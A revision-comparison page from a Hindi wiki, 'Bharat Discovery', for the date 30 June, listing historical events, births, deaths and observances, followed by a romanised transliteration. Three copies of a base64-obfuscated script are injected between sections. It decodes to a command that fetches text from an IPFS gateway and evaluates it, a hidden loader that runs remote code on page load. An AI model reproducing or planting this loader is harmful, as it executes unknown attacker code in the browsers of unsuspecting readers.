Difference between revisions of "30 जून"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " मे " to " में ")
 
(22 intermediate revisions by 3 users not shown)
Line 4: Line 4:
  
 
==30 जून की महत्त्वपूर्ण घटनाएँ==
 
==30 जून की महत्त्वपूर्ण घटनाएँ==
* [[2008]]- रविकांत, उमा शंकर चौधरी व विमल चन्द्र पाण्डेय को संयुक्त रूप से भारतीय ज्ञानपीठ का नवलेखन पुरस्कार प्रदान किया गया।
+
* [[1999]] - आस्ट्रेलियाई उप-प्रधानमंत्री तथा नेशनल पार्टी के नेता टीम फ़िशर का इस्तीफ़ा।
 +
* [[2002]] - ब्राजील ने जर्मनी को 2-0 से हराकर फ़ुटबाल के विश्व कप पर कब्ज़ा किया।
 +
* [[2003]] - चार आस्कर पुरस्कार प्राप्त अभिनेत्री कैथरीन हेपबर्न का निधन।
 +
* [[2005]] - ब्राजील ने कनफ़ेडरेशन फ़ुटबाल कप जीता।
 +
* [[2006]] - फ़ुटबाल विश्वकप में जर्मनी ने अर्जेन्टीना को हराया।
 +
* [[2007]] - संयुक्त राष्ट्र महासभा ने आम सहमति से शांति रक्षण विभाग के बंटवारे का निर्णय किया।
 +
* [[2008]] -  
 +
**रविकांत, उमा शंकर चौधरी व विमल चन्द्र पाण्डेय को संयुक्त रूप से भारतीय ज्ञानपीठ का नवलेखन पुरस्कार प्रदान किया गया।
 +
**भारतीय पत्रकार अनीसुद्दीन अजीज को इंटरनेशनल एसोसियेशन आफ़ बुक कीपर्स (आईएबी) के न्यू बिजनेस आफ़ द ईयर अवार्ड से सम्मानित किया गया। पाकिस्तान सरकार ने कबाइली ख़ैबर दर्रा क्षेत्र में दहशत फैला रहे तीन आतंकी गुटों पर प्रतिबन्ध लगाया। राबर्ट मुगावे ने जिम्बाव्वे के राष्ट्रपति के रूप में शपथ ली।
 +
 
 
==30 जून को जन्मे व्यक्ति==
 
==30 जून को जन्मे व्यक्ति==
 +
* [[1969]] - [[भूपेन्द्र यादव]] - भारतीय राजनीतिज्ञ और [[राज्य सभा]] के सांसद हैं।
 +
* [[1911]] - [[नागार्जुन]] - भारतीय साहित्यकार।
 +
* [[1921]] - [[रघुवंश (साहित्यकार)|रघुवंश]] - [[हिन्दी]] के प्रसिद्ध [[साहित्यकार]] एवं आलोचक थे।
 +
* [[1928]] - [[कल्याणजी (संगीतकार)|कल्याणजी]] - [[हिन्दी]] फ़िल्मों के प्रसिद्ध संगीतकर।
 +
* [[1934]] - [[सी. एन. आर. राव]] - भारत के प्रसिद्ध वैज्ञानिक।
 +
* [[1956]] - [[हरिवंश नारायण सिंह]] - भारतीय पत्रकार और राजनेता हैं।
 +
* [[1903]] - [[मुकुट बिहारी लाल भार्गव]] - भारतीय राजनीतिज्ञ तथा [[लोक सभा]] के सदस्य थे।
  
 
==30 जून को हुए निधन==
 
==30 जून को हुए निधन==
 +
* [[2007]] - [[साहिब सिंह वर्मा]] - [[भारतीय जनता पार्टी]] के उपाध्यक्ष व तेरहवीं लोक सभा के सांसद थे।
 +
* [[1985]] - [[के. एच. आरा]] - [[भारत]] के प्रसिद्ध चित्रकार थे।
 +
* [[1970]] - [[आशा देवी आर्यनायकम]] - एक समर्पित महिला थीं जिन्होंने अनभिज्ञता को दूर करने और ज्ञान, प्रेम और विश्वास से भरी दुनिया बनाने की कोशिश की।
 +
* [[1917]] - [[दादा भाई नौरोजी]] - [[भारत]] के प्रसिद्ध दिग्गज राजनेता, उद्योगपति, शिक्षाविद और विचारक।
  
 
==30 जून के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==30 जून के महत्त्वपूर्ण अवसर एवं उत्सव==
 
+
* [[हूल दिवस|संथाल हूल दिवस]]
 +
* [[अन्तरराष्ट्रीय क्षुद्रग्रह दिवस]]
 +
* [[अंतरराष्ट्रीय संसदीय दिवस]]
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}

Latest revision as of 10:06, 7 October 2021

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 30 joon varsh ka 181 vaan (lip varsh mean yah 182 vaan) din hai. sal mean abhi aur 184 din shesh haian.

30 joon ki mahattvapoorn ghatanaean

  • 1999 - astreliyaee up-pradhanamantri tatha neshanal parti ke neta tim fishar ka istifa.
  • 2002 - brajil ne jarmani ko 2-0 se harakar futabal ke vishv kap par kabza kiya.
  • 2003 - char askar puraskar prapt abhinetri kaitharin hepabarn ka nidhan.
  • 2005 - brajil ne kanafedareshan futabal kap jita.
  • 2006 - futabal vishvakap mean jarmani ne arjentina ko haraya.
  • 2007 - sanyukt rashtr mahasabha ne am sahamati se shaanti rakshan vibhag ke bantavare ka nirnay kiya.
  • 2008 -
    • ravikaant, uma shankar chaudhari v vimal chandr pandey ko sanyukt roop se bharatiy jnanapith ka navalekhan puraskar pradan kiya gaya.
    • bharatiy patrakar anisuddin ajij ko iantaraneshanal esosiyeshan af buk kipars (aeeebi) ke nyoo bijanes af d eeyar avard se sammanit kiya gaya. pakistan sarakar ne kabaili khaibar darra kshetr mean dahashat phaila rahe tin atanki gutoan par pratibandh lagaya. rabart mugave ne jimbavve ke rashtrapati ke roop mean shapath li.

30 joon ko janme vyakti

30 joon ko hue nidhan

30 joon ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>